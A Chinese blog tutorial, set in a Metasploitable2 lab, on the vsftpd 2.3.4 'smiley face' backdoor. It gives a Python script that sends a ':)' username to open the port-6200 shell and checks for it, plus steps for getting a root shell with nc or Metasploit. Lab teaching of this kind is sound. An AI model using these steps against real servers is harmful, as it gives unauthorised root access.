python——脚本实现检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)

已于 2022-06-01 00:26:00 修改
阅读量1.7w 收藏 114
点赞数 152
分类专栏: python每日一练 文章标签: python tcp/ip 安全
于 2022-01-25 23:19:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaofengdada/article/details/122693486
版权

警告

请勿使用本文提到的内容违反法律
本文不提供任何担保

 一、漏洞介绍

        vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终我们提到的权限也是root;当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,因此也称为笑脸漏洞。

二、环境搭建

攻击机(本机):192.168.1.3

靶机(metaspolit2):192.168.1.5

三、nmap进行漏洞检测

(四)python脚本进行漏洞检测

代码如下:

import socket
from ftplib import FTP

url = input("请输入你需要检测的地址:")
ftp = FTP()
username = 'root:)' #用户名必须包含:)这两个字符
password = 'anonymous' #密码随便啥都行
try:
    ftp.connect(url,21,timeout=10)#使用ftp登录,设置延时10秒
    ftp.login(username,password)
    ftp.quit()
except:
    print("完成登录检测")
try:
    s = socket.socket() #使用socket函数来检测是否有漏洞存在
    s.connect((url,6200))
    s.close()
    print("存在微笑漏洞")
except:
    print("没有发现笑脸漏洞!")

输出结果:

(五)漏洞复现

(一)使用nc进行漏洞利用

1、打开命令行登录ftp服务器,在用户名处输入xiaofeng:)然后随意输入一个密码回车等待,紧接着进行下一步:

2、打开一个新窗口,输入nc 目标ip 6200 即可连接。

(二)使用msf进行漏洞利用

1.打开MSFConsole搜索vsftpd_234并使用

2. 设置攻击目标,进行exploit即可获取shell。

xiaochuhe--kaishui
关注
  • 152
    点赞
  • 114
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 187
    评论
专栏目录
Python脚本实现Web漏洞扫描工具
09-21
是去年毕设做的一个Web漏洞扫描小工具,主要针对简单的SQL注入漏洞、SQL盲注和XSS漏洞。下文给大家介绍了使用说明和源代码,一起看看吧
python漏洞检测脚本_URL重定向漏洞python打造URL重定向漏洞检测脚本
weixin_39588983的博客
12-22 188
前言:今天学习了重定向漏洞,这个漏洞比较好理解漏洞名:URL重定向漏洞威胁:低漏洞的来源:开发者对head头做好对应的过滤和限制例子:有漏洞的网站:http://a.com/x.php?url=http://a.com/login.php这时我们通过写个url后面的链接让其跳转到指定的页面。例:http;//a.com/x.php?url=http://www.baidu.com可搭配使用的漏洞:...
使用LLM检测安全代码---Python漏洞检测的快速实验
安静的软件工程师
03-24 864
使用LLM检测安全代码---Python漏洞检测的快速实验
漏洞扫描技术
最新发布
Q2017977021的博客
04-09 882
漏洞扫描技术是一种用于检测计算机系统、网络或应用程序中存在的安全漏洞的方法。它通过自动化工具或软件来扫描系统,以发现可能被黑客利用的漏洞或弱点。
HACK学习黑帽子Python--漏洞检测脚本快速编写
qq_29437513的博客
11-15 2717
前言: 作为一名白帽,写脚本能快速的在挖洞过程中快速的批量验证。 为了让笔记更有实用性,这里以poc的形式: 01.如何发送HTTP请求 GET型: 01.有表单参数 request.get(url=url,params={}) params可以先用payload={‘username’:‘admin’}先代替 然后 params=payload 02.requests.get(url) POST型: 01.request.post(url,params={}),params同上 02.requests
使用python利用FTP2.3.4的笑脸漏洞
单核CPU的小朋友的博客
03-22 1365
首先FTP是一个文件传输协议,而且FTP是一种明文的传输协议,通过WIreshark抓包能够直接获取到FTP协议的传输内容。 而在FTP2.3.4版本中,当用户名中存在:)的笑脸标志时,能够直接执行系统命令。 我们如果在CTF中遇到了FTP2.3.4版本号的服务,可以使用python进行批量攻击,那我们需要编写脚本实现这个功能,同时我们最好是使用socket来实现FTP服务的明文通信。这个过程和使用nc命令来测试网络连通性是相同的。 而在python中,利用代码如下: import time impor
因为在此系统上禁止运行脚本_利用Python脚本实现漏洞情报监控与通知的经验分享...
weixin_39710561的博客
12-04 227
前言本文主要介绍了笔者利用一个简单的Python脚本实现漏洞情报的监控以及自动通报的相关经验。一、背景笔者所在公司某一个业务系统用到了漏洞频发的Struts2框架,S2-045爆发的时候刚好是刚进公司不久,还没有落实好漏洞通报排查工作,因此该业务系统的服务器就因为这个漏洞沦陷了,后续又接连出了好几个RCE漏洞,好在及时发布了预警和响应排查,没有受到影响。鉴于S2的漏洞频繁爆发,且动不动就...
strust2漏洞批量检查利用python脚本
05-17
python2.7,暂不支持python3,需安装几个python模块。
python 构建 ip 代理池以及简单的应用
Wollens Blogs
11-21 1124
背景摘要 由于最近在研究爬虫相关知识,有时在频繁获取(爬取)网站数据时会出现 ip 被限制的情况导致无法及时获取想要的数据,因此想着该搞个 ip proxy pool 啦,啥也不说开始干呗。 代码实现 import re import json import requests import urllib from lxml import etree url = 'https://raw.githubusercontent.com/fate0/proxylist/master/proxy.list' c
拒绝做工具小子—编写Python漏洞验证脚本
kali_Ma的博客
02-09 8031
前言 我们实战经常会遇到以下几个问题: ​ 1、遇到一个利用步骤十分繁琐的漏洞,中间错一步就无法利用 ​ 2、挖到一个通用漏洞,想要批量刷洞小赚一波,但手动去测试每个网站工作量太大 这个时候编写一个poc脚本将会将会减轻我们很多工作。本文将以编写一个高效通用的poc脚本为目的,学习一些必要的python知识,这周也是拒绝做工具小子努力学习的一周 requests模块使用技巧 Requests是Python中一个常用的HTTP请求库,使用Requests库来发起网络请求非常简单,具体的使用方法这里就不多介绍了
Struts2-057漏洞检测python脚本
11-04
Struts2-057检测python脚本,支持命令回显,计算和弹计算器
weblogic反序列化漏洞验证脚本python版)对4.18最新漏洞检测
05-11
对weblogic最新漏洞检测,自己已经测试,可以使用,在使用之前系统要安装python和修改py文件中的ip和weblogic端口
ARP主机扫描工具——Python脚本
06-03
简单的ARP主机扫描工具,通过ARP协议配合Python中的socket模块,对某个局域网内的主机进行简单扫描,并输出存活的主机
Python实现Yolo目标检测全面数据增强脚本 - 提升模型性能和泛化能力
12-28
这个资源包含一个为Yolo目标检测模型特别设计的数据增强Python脚本脚本采用多种数据增强技术,包括图像缩放(保持比例和下降比例)、随机水平和垂直翻转、中心裁剪,以及图像属性(亮度、对比度、饱和度)调整。...
编写Python脚本实现最简单的FTP下载的教程
12-23
访问FTP,无非两件事情:upload和download,最近在项目中需要从ftp下载大量文件,然后我就试着去实验自己的ftp操作类,如下(PS:此段有问题,别复制使用,可以参考去试验自己的ftp类!) import os from ftplib ...
Python实现的Google IP 可用性检测脚本
09-22
主要介绍了Python实现的Google IP 可用性检测脚本,本文脚本需要Python 3.4+环境,需要的朋友可以参考下
python攻击脚本实例-一键黑客工具:一个Python脚本搞定所有攻击操作
weixin_39745724的博客
11-11 3280
近期出现了可综合利用Shodan设备搜索引擎和Metasploit渗透测试工具的Python代码。该代码会用Shodan.io自动搜索有漏洞的在线设备,随后使用Metasploit的漏洞利用数据库劫持计算机和其他在线设备。只需点击运行,该脚本就会爬取互联网,寻找可以攻击的脆弱主机(通常是因为没打补丁),并自动取得对这些主机的控制权。完全无需什么高端的黑客技术。本文福利:私信回复【PDF】可获取Py...
编写Python脚本来提高渗透测试效率:用Python进行信息搜集、漏洞扫描和口令猜测
weixin_43263566的博客
05-23 1006
编写Python脚本来提高渗透测试效率:用Python进行信息搜集、漏洞扫描和口令猜测
python如何检测目标url存在GPON路由器远程命令执行漏洞
06-08
检测 GPON 路由器远程命令执行漏洞,需要先判断目标 URL 是否存在漏洞。可以使用 Python 编写脚本实现。以下是一个简单的 Python 脚本示例: ``` import requests url = "http://target-url.com/" # 检测漏洞 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 187
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaochuhe--kaishui

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值